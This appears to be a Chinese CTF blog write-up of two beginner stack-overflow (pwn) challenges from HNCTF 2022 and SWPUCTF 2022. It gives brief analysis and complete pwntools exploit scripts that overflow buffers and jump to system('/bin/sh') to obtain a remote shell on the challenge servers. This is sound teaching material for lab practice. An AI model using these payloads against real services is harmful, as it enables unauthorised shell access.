NSSCTF(PWN)8

[HNCTF 2022 Week1]ezr0p32

是32位文件

main函数里发现了dofunc双击进入

发现了read这里涉及了典型的栈溢出

发现没有binsh只有system,我们可以把之前找到的buf双击点开

发现bss当做binsh用,这题涉及到了shellcode

exp:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('node5.anna.nssctf.cn','24025')
bss = 0x804A080
system = 0x80483d0
padding = b'a'*(0x1c+0x4)
io.recvuntil(b'name')
io.sendline(b'/bin/sh')
io.recvuntil(b'time~')
payload = padding + p32(system) + p32(0xbeff) + p32(bss)
io.sendline(payload)
io.interactive()

注意这题的system里没有binsh要我们自己搭建一个binsh框架

[SWPUCTF 2022 新生赛]有手就行的栈溢出

这是一个64位文件

查看main函数发现overflow()双击进入

看到gets就知道这里栈溢出了

发现有system和binsh但是发现这个system有点不太一样是system('/bin/sh')有点奇怪,我们点开看看

发现这是假的后门啊

发现这才是真的后门

exp:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('node5.anna.nssctf.cn','27278')
padding = b'a'*(0x20+0x8)
door = 0x401257
payload = padding + p64(door)
io.sendline(payload)
io.interactive()           

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值